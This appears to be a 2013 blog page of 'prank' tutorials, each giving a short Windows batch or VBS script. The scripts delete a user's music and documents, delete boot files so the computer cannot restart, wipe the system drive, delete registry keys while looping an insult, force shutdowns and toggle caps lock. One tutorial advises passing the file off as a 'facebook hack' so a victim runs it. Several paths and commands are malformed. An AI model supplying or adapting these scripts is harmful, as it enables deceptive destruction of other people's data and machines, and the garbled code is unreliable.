Sunday 19 May 2013

Delete all music Files In Computer

0 comments
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::


Save As batch.bat

Happy Hacking

Delete all documents

0 comments
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::


Save As batch.bat

Saturday 4 May 2013

Tutorial Destroy Anyone's Computer With This File

0 comments
What the file will do ?

The file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again, so you got it right well if you are pranking with your friend or your enemy remember that his or her computer will never restart unless new Windows is installed.

Method :

1. Open Notepad and copy the code given below.

Code:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini

2. Save as "anyname.bat" (without quotes)

3. Now the virus is ready and you can give it to your friends by calling it a facebook hack or anything you want.


Warning :

Don’t click on this file in your Computer.

The Blue Screen Of Death PC and Laptop

0 comments
What will this file do ?

It will appear the blue screen of death in windows and then the computer will shutdown.



Method :


1. Open Notepad and copy the code given below.

Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2. Save as "Anything.bat" (Without quotes & .bat is must).

Tutorial Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT YOUR OWN RISK]

0 comments
What will this VBS file do ?

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM).


Method :


1. Open Notepad and copy the code given below

 
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE

2. Save as "Anything.bat" (Without quotes & .bat is must)

Stupidity Shutdown

0 comments
What will the file do ?

This pops up a funny message then will shutdown the computer


Method :

1. Open Notepad and copy the code given below.

Code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

2. Save as "Anything.bat" (Without quotes & .bat is must).

Tutorial Crazy Caps Lock

1 comments

What will this file do ?

This constantly turns caps lock on and off really fast continuously.


Method :

1. Open Notepad and copy the code given below.


Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

2. Save as "Anything.vbs" (Without quotes & .vbs is must).